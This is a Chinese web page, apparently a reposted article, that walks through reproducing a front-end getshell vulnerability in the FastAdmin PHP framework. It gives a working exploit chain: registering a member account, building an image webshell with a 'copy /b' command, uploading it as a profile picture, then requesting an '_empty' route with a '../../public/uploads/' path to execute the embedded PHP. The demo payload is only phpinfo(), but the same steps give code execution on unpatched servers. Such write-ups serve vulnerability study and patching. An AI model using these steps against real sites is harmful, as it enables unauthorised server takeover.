Fastadmin前台Getshell漏洞复现

时间:2023年06月11日

/

来源:网络

/

编辑:佚名

一、简介
FastAdmin是一款基于ThinkPHP5+Bootstrap开发的极速后台开发框架。FastAdmin基于Apache2.0开源协议发布,目前被广泛应用于各大行业应用后台管理。
二、漏洞复现
注:在Linux下,通过这种方法会失效,因为在 /public 路径下不存在 user 目录
1、登录前台会员中心,注册一个账户

2、使用注册的账户登录,点击会员中心"-》"个人资料"处,上传一个jpg图片马

合成图片木马test666.png
copy 1.png/b+1.php/a test666.png

查看图片木马看到有<?php phpinfo();?>

3、构造POC,GET /index/user/_empty?name=../../public/uploads/路径.jpg,
​​​​​​​访问http://xx.xx.xx.xx/index.php/index/user/_empty?name=../../public/uploads/20200924/500309dcf5c48dd851a218caa0f65566.jpg
猜你需要

豫ICP备2021026617号-1  豫公网安备:41172602000185   Copyright © 2021-2028 www.78moban.com/ All Rights Reserved

本站作品均来自互联网,转载目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责。如有侵犯您的版权,请联系 1565229909#qq.com(把#改成@),我们将立即处理。